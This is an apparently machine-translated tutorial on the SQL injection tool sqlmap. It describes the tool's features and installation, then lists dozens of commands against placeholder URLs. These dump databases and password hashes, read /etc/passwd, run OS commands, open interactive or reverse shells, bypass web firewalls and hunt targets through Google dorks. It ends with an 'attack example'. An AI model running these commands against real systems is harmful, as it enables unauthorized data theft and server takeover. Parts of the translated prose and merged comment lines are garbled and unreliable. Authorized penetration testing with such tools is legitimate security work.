About sqlmap
sqlmap is an open source penetration testing tool that automatically detect and exploit SQL injection vulnerabilities and take over the database server. It is equipped with a powerful engine is detected, the final penetration tester many features and extensive niche switch, acquired from the fingerprint database to the data from the database via the underlying file system band access and execute commands on the operating system.
sqlmap function
- Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB, Informix, MariaDB, MemSQL, TiDB, CockroachDB, HSQLDB, H2, MonetDB, Apache Derby, Vertica, Mckoi and Presto database management systems.
- Fully supports six SQL injection techniques: based on blind Boolean query, the query based on blind time, based on an incorrect query, based on the joint inquiry-based queries and outside the stack with tracking.
- Support direct connection to the database by providing DBMS credentials, IP address, port, and database name, without having to pass through SQL injection.
- Support enumerate users, password hashes, privileges, roles, databases, tables and columns
- Automatic identification and password hash format to break them using dictionary-based attacks.
- Support dump database tables complete that, according to the user's selection, a series of entries or a particular column. The user can also select a range of characters only dump entries in each column.
- Support search for a specific database name, across all databases of a particular table or across a specific column of all database tables . For example, it is useful for the identification credential comprises a custom application table, and the name of the relevant column contains the string, such as name and PASS.
- Supports download and upload any files when the database software is MySQL, PostgreSQL or MicrosoftSQLServer, from the database server underlying file system.
- Support to execute arbitrary commands and retrieve its standard output when the database software is MySQL, PostgreSQL or MicrosoftSQLServer, database server on the underlying operating system.
- ** support is established between the attacker's computer and the database server has state-of-band tcp connection. ** the underlying operating system. The channel may be interactive command prompt, Meterpreter session or (VNC) session according to user selection of a graphical user interface.
- Support database user privilege escalation process by Metasploit's Meterpreter
getsystem
command.
sqlmap installation
Download the installation package: https://pypi.org/project/sqlmap/#files
1. The installed package can be expanded to the C root directory
2. Then enter the folder path
3. Copy the path to the system environment variables
4. Start cmd terminal, this input tool sqlmap.py
Use sqlmap
Access to basic content
sqlmap -u "http://url/news?id=1" --current-user
# Get the current user name
sqlmap -u "http://www.xxoo.com/news?id=1" --current-db
# Get the current database name
sqlmap -u "http://www.xxoo.com/news?id=1" --tables -D "db_name"
# Get a list of names
sqlmap -u "http://url/news?id=1" --columns -T "tablename" users-D "db_name" -v 0
# Gets the field name
sqlmap -u "http://url/news?id=1" --dump -C "column_name" -T "table_name" -D "db_name" -v 0
# Gets the field content
Important information acquisition
sqlmap -u "http://url/news?id=1" --dbms "Mysql" --users # dbms
Specify the database type
sqlmap -u "http://url/news?id=1" --users
# Column in the database user
sqlmap -u "http://url/news?id=1" --dbs
# Column in the database
sqlmap -u "http://url/news?id=1" --passwords
# Database user password
sqlmap -u "http://url/news?id=1" --passwords-U root -v 0
# List the specified user database password
sqlmap -u "http://url/news?id=1" --dump -C "password,user,id" -T "tablename" -D "db_name" --start 1 --stop 20
# List the specified field, lists 20
sqlmap -u "http://url/news?id=1" --dump-all -v 0 #列出所有数据库所有表sqlmap -u "http://url/news?id=1" --privileges
# View Permissions
sqlmap -u "http://url/news?id=1" --privileges -U root #查看指定用户权限sqlmap -u "http://url/news?id=1" --is-dba -v 1
# Whether the database administrator
sqlmap -u "http://url/news?id=1" --roles
# Enumerate database user roles
sqlmap -u "http://url/news?id=1" --udf-inject
# Import user-defined functions (acquisition system privileges!)
sqlmap -u "http://url/news?id=1" --dump-all --exclude-sysdbs -v 0
# Table lists all the current library
sqlmap -u "http://url/news?id=1" --union-cols #union 查询表记录sqlmap -u "http://url/news?id=1" --cookie "COOKIE_VALUE"
#cookie injection
sqlmap -u "http://url/news?id=1" -b #获取banner信息sqlmap -u "http://url/news?id=1" --data "id=3"
#post injection
sqlmap -u "http://url/news?id=1" -v 1 -f
# Fingerprint identification database type
sqlmap -u "http://url/news?id=1" --proxy"http://127.0.0.1:8118"
# Proxy injection
sqlmap -u "http://url/news?id=1"--string"STRING_ON_TRUE_PAGE"
# Specify the keyword
sqlmap -u "http://url/news?id=1" --sql-shell #执行指定sql命令sqlmap -u "http://url/news?id=1" --file /etc/passwd
sqlmap -u "http://url/news?id=1" --os-cmd=whoami #执行系统命令sqlmap -u "http://url/news?id=1" --os-shell
# Interactive shell system
sqlmap -u "http://url/news?id=1" --os-pwn
# Rebound shell
sqlmap -u "http://url/news?id=1" --reg-read #读取win系统注册表sqlmap -u "http://url/news?id=1" --dbs-o "sqlmap.log"
# Save progress
sqlmap -u "http://url/news?id=1" --dbs -o "sqlmap.log" --resume
# Restore saved progress
Advanced Usage
-p name a number of parameters such as index.php? n_id = 1 & name = 2 & data = 2020 we want to specify a name parameter injection
sqlmap -g "google grammar" --dump-all --batch #google injection point automatically search all fields ran out of the need to ensure normal visit google.com
-technique test specified injection type \ use of technology
No arguments default to test all injection techniques
• B: Boolean-based blind SQL injection
• E: based on explicit wrong sql injection
• U: Based UNION injection
• S: laminate sql injection
• T: time-based blind
-tamper by bypassing the encoding WEB firewall (WAF) Sqlmap default with char ()
sqlmap -u "http://url/news?id=1" --smart --level 3 --users
# Smart intelligent level perform test level
Attack Example:
Sqlmap -u "http://url/news?id=1&Submit=Submit" --cookie="PHPSESSID=41aa833e6d0d28f489ff1ab5a7531406" --string="Surname" --dbms=mysql --users --password